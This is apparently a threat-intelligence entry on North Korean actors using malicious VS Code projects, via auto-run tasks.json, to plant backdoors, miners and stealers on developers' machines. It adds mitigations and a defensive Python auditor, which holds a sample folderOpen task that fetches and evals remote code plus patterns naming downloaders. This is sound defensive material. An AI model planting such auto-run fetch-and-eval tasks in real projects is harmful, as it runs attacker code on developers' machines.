
North Korea-Linked Hackers Target Developers via Malicious VS Code Projects

Medium
Vulnerability
Published: Tue Jan 20 2026 (01/20/2026, 18:41:00 UTC)
Source: The Hacker News

Description

The North Korean threat actors associated with the long-running Contagious Interview campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints. The latest finding demonstrates continued evolution of the new tactic that was first discovered in December 2025, Jamf Threat Labs said. "This activity involved

AI-Powered Analysis

Last updated: 01/21/2026, 03:06:31 UTC

Technical Analysis

The Contagious Interview campaign, attributed to North Korean state-sponsored actors, has evolved to abuse Microsoft Visual Studio Code's task configuration feature to deliver backdoors and malware to developers. The attack begins when a target is socially engineered to clone a malicious repository from a platform such as GitHub, GitLab, or Bitbucket and open it in VS Code, often under the guise of a job assessment. If the user accepts VS Code's Workspace Trust prompt (trusting the repository's authors), VS Code automatically executes the commands defined in the repository's tasks.json with the "runOn": "folderOpen" option, so arbitrary code runs without any further user interaction.

That code fetches obfuscated JavaScript payloads hosted on Vercel domains, which establish persistent backdoors named BeaverTail (Node.js based) and InvisibleFerret (Python based). These backdoors provide remote code execution, system fingerprinting, and continuous communication with command and control servers. The malware also includes modules for keylogging, screenshot capture, clipboard manipulation to substitute cryptocurrency wallet addresses, and exfiltration of sensitive files. Additionally, the campaign deploys an XMRig cryptocurrency miner and installs AnyDesk for remote access. The attackers employ fallback mechanisms such as malicious npm packages and multi-stage droppers disguised as spell-check dictionaries, so that the payload is still delivered if the initial method fails.

The campaign targets developers, especially those in the cryptocurrency, blockchain, and fintech sectors, aiming to steal intellectual property, gain unauthorized access to internal systems, and siphon digital assets. Delivering malware through legitimate developer tools and workflows is a deliberate approach to evade detection and raise infection success rates. The campaign's evolution reflects the DPRK actors' intent to expand their cyber espionage and financial theft capabilities in support of a regime under heavy sanctions.

Potential Impact

European organizations, particularly those with active software development teams in fintech, blockchain, and cryptocurrency sectors, face significant risks from this campaign. Compromise of developer machines can lead to theft of intellectual property, source code, and sensitive internal data, undermining competitive advantage and regulatory compliance. Unauthorized remote code execution on developer endpoints can facilitate lateral movement within networks, potentially exposing critical infrastructure and financial systems. The deployment of cryptocurrency miners can degrade system performance and increase operational costs. The use of remote access tools like AnyDesk further escalates the risk of persistent unauthorized access and data exfiltration. Given the targeting of developers, supply chain risks increase as compromised code or credentials may propagate malware or backdoors into production environments. The campaign’s stealthy use of legitimate tools complicates detection and response, increasing potential dwell time and damage. European organizations may also face reputational damage and regulatory penalties if breaches lead to exposure of personal or financial data. The campaign’s focus on cryptocurrency and fintech sectors aligns with Europe’s growing digital finance markets, amplifying potential financial losses and strategic impacts.

Mitigation Recommendations

1. Enforce strict policies on trusting VS Code repositories, including user education to avoid blindly trusting unknown or unsolicited repositories, especially those received via social engineering.
2. Disable or restrict automatic execution of VS Code task configurations (tasks.json) in enterprise environments, or require explicit user approval with enhanced warnings.
3. Implement endpoint detection and response (EDR) solutions capable of monitoring and alerting on suspicious VS Code task executions, Node.js runtime invocations, and unusual network connections to domains like Vercel.
4. Use network security controls to block or monitor traffic to suspicious or untrusted hosting platforms and domains known to be used by threat actors.
5. Conduct regular audits of developer machines for unauthorized npm packages or unusual Python environments indicative of malware.
6. Employ multi-factor authentication and least privilege principles for developer accounts to limit lateral movement if a compromise occurs.
7. Integrate software supply chain security practices, including code signing, repository scanning, and dependency vetting, to detect and prevent malicious code inclusion.
8. Monitor clipboard activity and system processes for signs of wallet address substitution or keylogging.
9. Establish incident response playbooks specifically addressing developer environment compromises and supply chain attacks.
10. Collaborate with threat intelligence providers to stay updated on evolving tactics and indicators of compromise related to this campaign.
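The folderOpen mechanism described in the technical analysis, and the tasks.json audit suggested in mitigations 2, 3 and 5, can be checked on a cloned repository before it is ever opened in VS Code. The script below is an added example, not code from the article or from Jamf Threat Labs: it parses a `.vscode/tasks.json` (which is JSONC, so comments must be stripped without mangling the `//` inside URLs), reports every task that VS Code would run automatically on folderOpen, and tags the command with heuristic indicators. The sample tasks.json and the `example.invalid` URL are constructed for the demonstration.

```python
import json
import re

# Constructed sample of a .vscode/tasks.json lure (not an artifact from the article).
SAMPLE_TASKS_JSON = r'''{
  // auto-runs as soon as a trusted workspace is opened
  "version": "2.0.0",
  "tasks": [
    {"label": "setup", "type": "shell",
     "command": "node -e \"fetch('https://example.invalid/p').then(r=>r.text()).then(eval)\"",
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "build", "type": "npm", "script": "build"} /* benign, runs only on demand */
  ]
}'''

# Heuristic patterns worth flagging in an auto-run task command (not exhaustive).
SUSPICIOUS = [
    (r"\bnode\b.*\s-e\b", "node -e inline script"),
    (r"\bpython\d?\b.*\s-c\b", "python -c inline script"),
    (r"\beval\b", "eval of dynamic content"),
    (r"\b(curl|wget|Invoke-WebRequest|iwr)\b", "downloader in task"),
    (r"https?://", "remote URL in task command"),
]

# Matches a JSON string literal, a // line comment, or a /* */ block comment, in that order.
_JSONC_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def strip_jsonc(text: str) -> str:
    """Drop comments (tasks.json is JSONC); string literals are matched first so
    a '//' inside a URL is never mistaken for a comment."""
    return _JSONC_TOKEN.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)

def audit_tasks(text: str) -> list:
    """Return one finding per task that VS Code would run automatically on folderOpen."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmd = " ".join(str(a) for a in [task.get("command", ""), *task.get("args", [])])
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, cmd)]
        findings.append({"label": task.get("label"), "command": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[auto-run] {f['label']}: {f['command']}  flags={f['reasons']}")
```

Run `audit_tasks` over the contents of a cloned repository's `.vscode/tasks.json` as a pre-open check; independently, the VS Code user setting `"task.allowAutomaticTasks": "off"` stops folderOpen tasks from running at all.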


Technical Details

Article Source: https://thehackernews.com/2026/01/north-korea-linked-hackers-target.html (fetched 2026-01-21T03:06:09.942Z, 1555 words)

Threat ID: 697042a44623b1157c81b943

Added to database: 1/21/2026, 3:06:12 AM

Last enriched: 1/21/2026, 3:06:31 AM

Last updated: 2/7/2026, 10:51:42 PM

